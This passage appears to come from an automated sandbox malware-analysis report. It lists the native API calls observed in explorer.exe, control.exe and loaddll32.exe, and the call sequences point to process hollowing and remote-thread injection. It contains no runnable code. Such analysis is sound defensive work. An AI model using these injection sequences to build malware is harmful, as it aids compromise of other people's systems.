            Source: C:\Windows\explorer.exeCode function: 37_2_03B6F0C0 NtAllocateVirtualMemory,37_2_03B6F0C0
            Source: C:\Windows\explorer.exeCode function: 37_2_03B68800 NtQuerySystemInformation,37_2_03B68800
            Source: C:\Windows\explorer.exeCode function: 37_2_03B8A004 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_03B8A004
            Source: C:\Windows\System32\control.exeCode function: 38_2_009C10A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,38_2_009C10A0
            Source: C:\Windows\System32\control.exeCode function: 38_2_009BF0C0 NtAllocateVirtualMemory,38_2_009BF0C0
            Source: C:\Windows\System32\control.exeCode function: 38_2_009B72AC NtWriteVirtualMemory,38_2_009B72AC
            Source: C:\Windows\System32\control.exeCode function: 38_2_009B8208 NtQueryInformationProcess,38_2_009B8208
            Source: C:\Windows\System32\control.exeCode function: 38_2_009C6A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,38_2_009C6A5C
            Source: C:\Windows\System32\control.exeCode function: 38_2_009A8790 NtCreateSection,38_2_009A8790
            Source: C:\Windows\System32\control.exeCode function: 38_2_009B13A8 NtMapViewOfSection,38_2_009B13A8
            Source: C:\Windows\System32\control.exeCode function: 38_2_009B23A4 NtQueryInformationProcess,38_2_009B23A4
            Source: C:\Windows\System32\control.exeCode function: 38_2_009B0BE8 NtReadVirtualMemory,38_2_009B0BE8
            Source: C:\Windows\System32\control.exeCode function: 38_2_009A2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,38_2_009A2710
            Source: C:\Windows\System32\control.exeCode function: 38_2_009DA004 NtProtectVirtualMemory,NtProtectVirtualMemory,38_2_009DA004
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_015121D40_2_015121D4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100014EE0_2_100014EE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100012F10_2_100012F1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1000155A0_2_1000155A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100037DC0_2_100037DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F6B0DC0_2_02F6B0DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F659200_2_02F65920
            Source: C:\Windows\explorer.exeCode function: 37_2_03B5E2F037_2_03B5E2F0
            Source: C:\Windows\explor